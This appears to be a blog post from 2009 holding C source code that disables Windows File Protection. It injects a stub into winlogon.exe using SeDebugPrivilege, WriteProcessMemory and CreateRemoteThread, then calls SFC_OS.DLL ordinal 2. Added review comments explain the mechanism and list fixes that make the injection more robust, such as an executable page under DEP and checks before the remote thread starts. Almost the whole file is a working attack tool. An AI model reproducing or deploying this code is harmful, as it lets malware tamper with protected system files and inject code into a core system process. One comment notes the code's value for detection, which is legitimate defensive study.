分类: C/C++

2009-07-06 17:37:19


#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Shlwapi.h>
#include <sfc.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <iostream>
#pragma comment(lib,"sfc.lib")
#pragma comment(lib,"shlwapi.lib")


#pragma check_stack (off)
/*
 * Stub that is copied byte-for-byte into the target process: TerminateSfc
 * writes the range [thread_func, after_thread_func) into winlogon.exe with
 * WriteProcessMemory and starts it with CreateRemoteThread, passing the
 * address of SFC_OS.DLL ordinal 2 as the thread parameter.
 *
 * Because only raw bytes are copied, the body must not reference anything
 * in this module: the one call goes through the function pointer received
 * as the parameter, so no fixed-up address is needed.  check_stack is
 * turned off presumably so the compiler emits no stack-probe helper call
 * that would be unresolvable once the bytes run in another process.
 *
 * NOTE(review): the signature lacks WINAPI, while CreateRemoteThread takes
 * an LPTHREAD_START_ROUTINE (stdcall on x86).  The cast at the call site
 * makes it compile, but the calling convention is not actually matched --
 * confirm on the target toolchain/architecture.
 */
DWORD thread_func (FARPROC sfc_terminate)
{
sfc_terminate();
return 0;
}
/*
 * Intentionally empty.  Used only as an end-of-code marker: the number of
 * bytes copied by TerminateSfc is (after_thread_func - thread_func).  This
 * assumes the linker keeps the two functions adjacent, in this order, and
 * that neither symbol is an incremental-link thunk -- a layout assumption
 * that holds for a typical release build, not a language guarantee.
 */
void after_thread_func(void)
{
}
#pragma check_stack

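// Enable SeDebugPrivilege

/*
 * Enable SeDebugPrivilege in the current process token so that a later
 * OpenProcess(PROCESS_ALL_ACCESS) on winlogon.exe can succeed.
 *
 * Returns 1 when the privilege is now enabled, 0 otherwise.
 *
 * AdjustTokenPrivileges returns non-zero even when it could not enable the
 * requested privilege (it then sets GetLastError() to
 * ERROR_NOT_ALL_ASSIGNED).  The original tested the return value only and
 * therefore reported success for a token that does not hold the privilege
 * at all (e.g. a non-administrator); GetLastError() is checked as well.
 */
int AdjustPrivileges(void)
{
    HANDLE token_handle = NULL;
    int ret = 0;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &token_handle))
        return 0;

    LUID luid;
    if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) {
        TOKEN_PRIVILEGES tk_priv;
        tk_priv.PrivilegeCount = 1;
        tk_priv.Privileges[0].Luid = luid;
        tk_priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        /* Non-zero return alone is not success; see header comment. */
        if (AdjustTokenPrivileges(token_handle, FALSE, &tk_priv, 0, NULL, NULL)
            && GetLastError() == ERROR_SUCCESS)
            ret = 1;
    }

    CloseHandle(token_handle);
    return ret;
}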

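// Look up a process ID by executable name

/*
 * Return the PID of the first running process whose image name equals
 * pname (case-insensitive), or 0 when no such process exists or the
 * Toolhelp snapshot cannot be taken.  0 is a safe "not found" sentinel:
 * it is the System Idle Process, which a caller can never open.
 *
 * Only the first match is returned; if several processes share the name
 * (e.g. one winlogon.exe per session on a multi-session host) the caller
 * gets whichever the snapshot lists first.
 *
 * Assumes an ANSI build (szExeFile is a char array); under UNICODE the
 * comparison below would not compile.
 *
 * Changes from the original: the snapshot-failure path returned the BOOL
 * FALSE from a DWORD function, and the comparison used the non-standard
 * stricmp name; both are replaced with the consistent DWORD 0 and the
 * CRT's _stricmp.
 */
DWORD GetProcessID(const char *pname)
{
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE)
        return 0;

    DWORD pid = 0;
    PROCESSENTRY32 entry = {0};
    entry.dwSize = sizeof entry;   /* Process32First rejects a zero dwSize */

    if (Process32First(snapshot, &entry)) {
        do {
            if (_stricmp(entry.szExeFile, pname) == 0) {
                pid = entry.th32ProcessID;
                break;
            }
        } while (Process32Next(snapshot, &entry));
    }

    CloseHandle(snapshot);
    return pid;
}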

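// Disable Windows File Protection (WFP)

/*
 * Disable Windows File Protection by running SFC_OS.DLL ordinal 2 inside
 * winlogon.exe, the process that hosts the WFP watcher.  Mechanism: the
 * bytes of thread_func are copied into winlogon and started with
 * CreateRemoteThread; the stub receives the address of ordinal 2 as its
 * thread parameter and calls it.
 *
 * Terminates the whole program with exit(0) when SeDebugPrivilege cannot
 * be enabled or winlogon cannot be opened (behaviour kept from the
 * original); every other failure prints a message and cleans up.
 *
 * Caveats a reader should know before relying on this:
 *  - The ordinal-2 address is resolved in *this* process and used inside
 *    winlogon.  That only works when SFC_OS.DLL is mapped at the same base
 *    in both processes -- true on the XP-era systems this targets, not
 *    guaranteed once ASLR is in play.
 *  - The copy size is after_thread_func - thread_func, a function-layout
 *    assumption; incremental linking / debug builds can break it.
 *  - A fault in the injected stub takes down winlogon (on XP that means a
 *    system restart), so every address and handle is validated before the
 *    remote thread is started, and the stub's page is never released while
 *    the thread may still be running in it.
 *  - Creating a remote thread in winlogon is exactly the pattern AV/EDR
 *    products alert on; this is the classic WFP-disable technique and is
 *    useful to know for detection as much as for use.
 *
 * Fixes relative to the original: unchecked LoadLibrary/GetProcAddress
 * results (a NULL would be called inside winlogon), unchecked PID 0, stub
 * page allocated PAGE_READWRITE although it is executed (faults under
 * DEP), VirtualFreeEx after a wait timeout (frees code a live thread is
 * executing), and a leaked SFC_OS.DLL reference.
 */
void TerminateSfc()
{
    if (!AdjustPrivileges()) {
        MessageBox(NULL, "调整权限错误", "", MB_OK);
        exit(0);
    }

    /* 0 is GetProcessID's "not found" sentinel; never try to open PID 0. */
    DWORD wpid = GetProcessID("winlogon.exe");
    if (wpid == 0) {
        printf("winlogon.exe not found\n");
        return;
    }

    HMODULE sfc = LoadLibrary("SFC_OS.DLL");
    if (!sfc) {
        printf("Error %d loading SFC_OS.DLL\n", GetLastError());
        return;
    }

    /* Ordinal 2 is imported by number (it is not exported by name).  A NULL
     * here would be dereferenced inside winlogon, so check before injecting. */
    FARPROC sfc_terminate = GetProcAddress(sfc, (LPCSTR) 2);
    if (!sfc_terminate) {
        printf("Error %d resolving SFC_OS.DLL ordinal 2\n", GetLastError());
        FreeLibrary(sfc);
        return;
    }

    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, wpid);
    if (!process) {
        printf("Error %d opening winlogon.exe (pid %lu)\n", GetLastError(), wpid);
        FreeLibrary(sfc);
        exit(0);
    }

    SIZE_T stub_size = (SIZE_T) ((char *) after_thread_func - (char *) thread_func);
    LPVOID remote_mem = NULL;
    HANDLE remote_thread = NULL;
    BOOL stub_finished = FALSE;

    /* The stub is executed in place, so the page must be executable: with
     * DEP enabled a thread started in PAGE_READWRITE memory faults at its
     * first instruction -- inside winlogon. */
    remote_mem = VirtualAllocEx(process, NULL, stub_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!remote_mem) {
        printf("Error %d while committing memory in the remote process\n", GetLastError());
        goto clean_up;
    }

    if (!WriteProcessMemory(process, remote_mem, (char *) thread_func, stub_size, NULL)) {
        printf("Error %d while writing to the remote process\n", GetLastError());
        goto clean_up;
    }

    remote_thread = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE) remote_mem,
                                       (LPVOID) sfc_terminate, 0, NULL);
    if (!remote_thread) {
        printf("Error %d while creating remote thread in the process\n", GetLastError());
        goto clean_up;
    }

    if (WaitForSingleObject(remote_thread, 10 * 1000) == WAIT_OBJECT_0)
        stub_finished = TRUE;
    else
        printf("Timeout occurred while waiting for the remote thread\n");
    CloseHandle(remote_thread);

clean_up:
    /* Release the stub page only if no thread was started in it or that
     * thread has finished; leaking a page beats crashing winlogon. */
    if (remote_mem && (!remote_thread || stub_finished))
        VirtualFreeEx(process, remote_mem, 0, MEM_RELEASE);
    CloseHandle(process);
    FreeLibrary(sfc);
}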
